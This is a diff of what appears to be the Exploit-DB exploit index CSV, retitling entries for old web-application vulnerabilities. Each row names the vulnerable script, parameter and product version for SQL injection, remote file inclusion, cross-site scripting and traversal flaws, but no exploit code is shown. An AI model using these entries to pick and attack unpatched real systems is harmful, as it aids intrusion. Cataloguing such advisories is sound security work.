 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0
 23616,platforms/php/webapps/23616.txt,"PHPGedView 2.x - Editconfig_gedcom.php Directory Traversal",2004-01-30,"Cedric Cochin",php,webapps,0
-23617,platforms/php/webapps/23617.txt,"PHPGedView 2.x - [GED_File]_conf.php Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps,0
+23617,platforms/php/webapps/23617.txt,"PHPGedView 2.x - '[GED_File]_conf.php' Remote File Inclusion",2004-01-30,"Cedric Cochin",php,webapps,0
 23618,platforms/php/webapps/23618.txt,"JBrowser 1.0/2.x - browser.php Directory Traversal",2004-01-30,"Himeur Nourredine",php,webapps,0
-23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
-23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
-23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
+23619,platforms/php/webapps/23619.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'fonctions.lib.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
+23620,platforms/php/webapps/23620.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'derniers_commentaires.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
+23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0
 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0
 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0
 23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection",2012-12-24,Red_Hat,php,webapps,0
@@ -27264,8 +27268,8 @@ id,file,description,date,author,platform,type,port
 23676,platforms/asp/webapps/23676.txt,"Maxwebportal 1.3x - down.asp HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0
 23677,platforms/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message SendTo Parameter Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0
 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0
-23683,platforms/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
-23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23683,platforms/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
+23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0
 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0
 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - 'info.inc.php' Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
@@ -27308,7 +27312,7 @@ id,file,description,date,author,platform,type,port
 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0
 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0
 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0
-23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - Multiple Module Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0
+23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x - (Multiple Modules) Cross-Site Scripting Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0
 23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 - Pop Parameter Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0
 23797,platforms/php/webapps/23797.txt,"Confixx 2 - DB Parameter SQL Injection",2004-03-09,wkr,php,webapps,0
 23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,php,webapps,0
@@ -27320,7 +27324,7 @@ id,file,description,date,author,platform,type,port
 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps,0
 23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0
 23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - fname Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0
-23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - displaycategory.php basepath Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0
+23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0
 23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection",2004-03-15,"Janek Vind",php,webapps,0
 23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - nmimage.php z Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0
 23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0
@@ -27440,9 +27444,9 @@ id,file,description,date,author,platform,type,port
 24006,platforms/php/webapps/24006.txt,"phpBugTracker 0.9 - query.php Multiple Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0
 24007,platforms/php/webapps/24007.txt,"phpBugTracker 0.9 - user.php bugid Parameter Cross-Site Scripting",2004-04-15,JeiAr,php,webapps,0
 24008,platforms/php/webapps/24008.html,"SCT Campus Pipeline 1.0/2.x/3.x - Email Attachment Script Injection",2004-04-15,"spiffomatic 64",php,webapps,0
-24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - affich.php Remote File Inclusion Command Injection",2004-04-15,jaguar,php,webapps,0
+24009,platforms/php/webapps/24009.txt,"Gemitel 3.50 - 'affich.php' Remote File Inclusion / Command Injection",2004-04-15,jaguar,php,webapps,0
 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0
-24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - album_portal.php Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0
+24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0
 24034,platforms/php/webapps/24034.txt,"PHProfession 2.5 - modules.php offset Parameter SQL Injection",2004-04-23,"Janek Vind",php,webapps,0
 24035,platforms/php/webapps/24035.txt,"PHProfession 2.5 - upload.php Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0
 24036,platforms/php/webapps/24036.txt,"PHProfession 2.5 - modules.php jcode Parameter Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps,0
@@ -27501,7 +27505,7 @@ id,file,description,date,author,platform,type,port
 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0
 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0
 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0
-24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0
+24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0
 24169,platforms/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps,0
 24172,platforms/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0
 24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter File Disclosure",2004-06-07,"John Doe",cgi,webapps,0
@@ -27568,7 +27572,7 @@ id,file,description,date,author,platform,type,port
 24294,platforms/php/webapps/24294.txt,"WordPress Plugin Developer Formatter - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps,0
 24295,platforms/php/webapps/24295.txt,"Adult WebMaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0
 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps,0
-24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0
+24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - 'Common.php' Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0
 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0
@@ -27740,7 +27744,7 @@ id,file,description,date,author,platform,type,port
 24627,platforms/php/webapps/24627.txt,"Qool CMS 2.0 RC2 - Multiple Vulnerabilities",2013-03-07,LiquidWorm,php,webapps,0
 24629,platforms/php/webapps/24629.txt,"CosCMS 1.721 - OS Command Injection",2013-03-07,"High-Tech Bridge SA",php,webapps,0
 24630,platforms/cgi/webapps/24630.txt,"mnoGoSearch 3.3.12 (search.cgi) - Arbitrary File Read",2013-03-07,"Sergey Bobrov",cgi,webapps,0
-24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - Remote PHP File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0
+24638,platforms/php/webapps/24638.txt,"@lexPHPTeam @lex Guestbook 3.12 - PHP Remote File Inclusion",2004-09-27,"Himeur Nourredine",php,webapps,0
 24641,platforms/php/webapps/24641.txt,"WordPress 1.2 - 'wp-login.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0
 24642,platforms/php/webapps/24642.txt,"WordPress 1.2 - 'admin-header.php' redirect_url Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0
 24643,platforms/php/webapps/24643.txt,"WordPress 1.2 - 'bookmarklet.php' Multiple Parameter Cross-Site Scripting",2004-09-28,"Thomas Waldegger",php,webapps,0
@@ -27802,7 +27806,7 @@ id,file,description,date,author,platform,type,port
 24742,platforms/php/webapps/24742.txt,"Web Cookbook - Multiple SQL Injections",2013-03-13,"Saadat Ullah",php,webapps,0
 24744,platforms/multiple/webapps/24744.txt,"Apache Rave 0.11 < 0.20 - User Information Disclosure",2013-03-13,"Andreas Guth",multiple,webapps,0
 24748,platforms/php/webapps/24748.txt,"event Calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0
-24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - 'admin_cash.php' Remote PHP File Inclusion",2004-11-17,"Jerome Athias",php,webapps,0
+24751,platforms/php/webapps/24751.pl,"phpBB 2.0.x - 'admin_cash.php' PHP Remote File Inclusion",2004-11-17,"Jerome Athias",php,webapps,0
 24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 - 'index.php' Post Action SQL Injection",2004-11-18,anonymous,php,webapps,0
 24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",php,webapps,0
 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0
@@ -27921,10 +27925,10 @@ id,file,description,date,author,platform,type,port
 25184,platforms/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injections",2005-03-02,"benji lemien",php,webapps,0
 25185,platforms/php/webapps/25185.txt,"D-Forum 1.11 - Nav.php3 Cross-Site Scripting",2005-03-03,benjilenoob,php,webapps,0
 25186,platforms/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension - SQL Injection",2005-03-03,"Fabian Becker",php,webapps,0
-25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - Remote PHP File Inclusion",2005-03-04,"Filip Groszynski",php,webapps,0
+25189,platforms/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",php,webapps,0
 25192,platforms/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,php,webapps,0
 25193,platforms/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0
-29278,platforms/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - forum.php Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0
+29278,platforms/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion",2006-12-13,the_Edit0r,php,webapps,0
 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0
 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0
 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0
@@ -27934,7 +27938,7 @@ id,file,description,date,author,platform,type,port
 25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"James Bercegay",php,webapps,0
 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps,0
 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0
-25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0
+25043,platforms/php/webapps/25043.txt,"phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0
 25044,platforms/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",php,webapps,0
 25045,platforms/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,php,webapps,0
 25051,platforms/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution",2004-12-23,"Poznan Supercomputing",cgi,webapps,0
@@ -27989,7 +27993,7 @@ id,file,description,date,author,platform,type,port
 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
 25142,platforms/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,hardware,webapps,0
 25143,platforms/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 - SML Code Script Injection",2005-02-21,"Daniel A.",php,webapps,0
-25145,platforms/php/webapps/25145.txt,"PANews 2.0 - Remote PHP Script Code Execution",2005-02-21,tjomka,php,webapps,0
+25145,platforms/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,php,webapps,0
 25147,platforms/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",cgi,webapps,0
 25148,platforms/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",asp,webapps,0
 25149,platforms/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",php,webapps,0
@@ -28034,12 +28038,12 @@ id,file,description,date,author,platform,type,port
 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0
 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0
 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0
-25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
+25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - 'Votebox.php' Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0
 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0
 25230,platforms/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",php,webapps,0
-25232,platforms/php/webapps/25232.txt,"McNews 1.x - install.php Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0
+25232,platforms/php/webapps/25232.txt,"McNews 1.x - 'install.php' Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",php,webapps,0
 25233,platforms/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - search.asp Cross-Site Scripting",2005-03-17,"farhad koosha",asp,webapps,0
 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",php,webapps,0
 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0
@@ -28063,7 +28067,7 @@ id,file,description,date,author,platform,type,port
 25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-03-22,"James Bercegay",php,webapps,0
 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0
 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
-25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
+25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0
 25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0
 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0
 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0
@@ -28191,7 +28195,7 @@ id,file,description,date,author,platform,type,port
 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0
 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0
 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0
-25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0
+25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0
 25455,platforms/asp/webapps/25455.txt,"OneWorldStore - 'DisplayResults.asp' SQL Injection",2005-04-19,Lostmon,asp,webapps,0
 25456,platforms/asp/webapps/25456.txt,"OneWorldStore - 'DisplayResults.asp' Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0
 25457,platforms/php/webapps/25457.c,"UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection",2005-03-11,HLL,php,webapps,0
@@ -28260,7 +28264,7 @@ id,file,description,date,author,platform,type,port
 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - QPid Parameter SQL Injection",2005-04-26,SVT,php,webapps,0
 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
 25537,platforms/asp/webapps/25537.txt,"MetaCart E-Shop V-8 - StrCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
-25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 - error.php Remote File Inclusion",2005-04-26,Kold,php,webapps,0
+25538,platforms/php/webapps/25538.txt,"GrayCMS 1.1 - 'error.php' Remote File Inclusion",2005-04-26,Kold,php,webapps,0
 25539,platforms/asp/webapps/25539.txt,"MetaCart2 - IntCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
 25540,platforms/asp/webapps/25540.txt,"MetaCart2 - StrSubCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
 25541,platforms/asp/webapps/25541.txt,"MetaCart2 - CurCatalogID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
@@ -28378,7 +28382,7 @@ id,file,description,date,author,platform,type,port
 25700,platforms/asp/webapps/25700.txt,"Spread The Word - Multiple Cross-Site Scripting Vulnerabilities",2005-05-24,Lostmon,asp,webapps,0
 25701,platforms/asp/webapps/25701.txt,"Spread The Word - Multiple SQL Injections",2005-05-24,Lostmon,asp,webapps,0
 25702,platforms/java/webapps/25702.txt,"Sun JavaMail 1.x - Multiple Information Disclosure Vulnerabilities",2005-05-24,"Ricky Latt",java,webapps,0
-25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - Poll_Vote.php Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0
+25704,platforms/php/webapps/25704.txt,"PHP Poll Creator 1.0.1 - 'Poll_Vote.php' Remote File Inclusion",2005-05-25,"rash ilusion",php,webapps,0
 25705,platforms/asp/webapps/25705.txt,"FunkyASP AD Systems 1.1 - 'login.asp' SQL Injection",2005-05-25,Romty,asp,webapps,0
 25715,platforms/hardware/webapps/25715.py,"HP LaserJet Pro P1606dn - Webadmin Password Reset",2013-05-26,m3tamantra,hardware,webapps,0
 25716,platforms/php/webapps/25716.py,"AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection",2013-05-26,mr.pr0n,php,webapps,0
@@ -28450,9 +28454,9 @@ id,file,description,date,author,platform,type,port
 25781,platforms/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0
 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps,0
 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injections",2005-06-02,"Dedi Dwianto",asp,webapps,0
-25786,platforms/php/webapps/25786.txt,"MWChat 6.7 - Start_Lobby.php Remote File Inclusion",2005-06-03,Status-x,php,webapps,0
+25786,platforms/php/webapps/25786.txt,"MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion",2005-06-03,Status-x,php,webapps,0
 25787,platforms/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",php,webapps,0
-25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.php Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0
+25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps,0
 25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,asp,webapps,0
 25792,platforms/php/webapps/25792.txt,"YaPiG 0.9x - Local/Remote File Inclusion",2005-06-06,anonymous,php,webapps,0
 25793,platforms/php/webapps/25793.txt,"YaPiG 0.9x - view.php Cross-Site Scripting",2005-06-06,anonymous,php,webapps,0
@@ -28500,9 +28504,9 @@ id,file,description,date,author,platform,type,port
 25854,platforms/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0
 25855,platforms/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0
 25856,platforms/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"James Bercegay",php,webapps,0
-25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - Config_Settings.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
+25857,platforms/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
 25858,platforms/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",asp,webapps,0
-25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - Top_Graph_Header.php Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
+25859,platforms/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps,0
 25860,platforms/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 - type.asp iType Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0
 25861,platforms/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 - productDelete.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0
 25862,platforms/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 - productEdit.asp iCat Parameter SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps,0
@@ -28575,7 +28579,7 @@ id,file,description,date,author,platform,type,port
 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0
 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.cgi Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0
 25940,platforms/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps,0
-25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0
